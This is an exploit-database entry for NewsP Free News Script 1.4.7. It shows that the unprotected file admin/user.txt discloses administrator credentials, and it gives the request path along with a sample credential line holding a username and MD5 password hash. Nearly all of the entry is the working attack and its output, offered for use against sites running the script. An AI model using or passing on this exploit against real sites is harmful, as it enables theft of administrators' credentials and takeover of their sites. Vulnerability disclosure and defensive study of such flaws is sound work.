id: 25180
date: 07/19/2016
title: NewsP Free News Script 1.4.7 - User Credentials Disclosure
author: Meisam Monsef
cves: 

# Exploit Title: Free News Script User Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns
# Version: All Version
# Download Link : http://www.newsp.eu/newsp.zip
 
Exploit :
http://site/admin/user.txt
Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1|
 
Username = Admin
Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5]

#  0day.today [2023-03-24]  #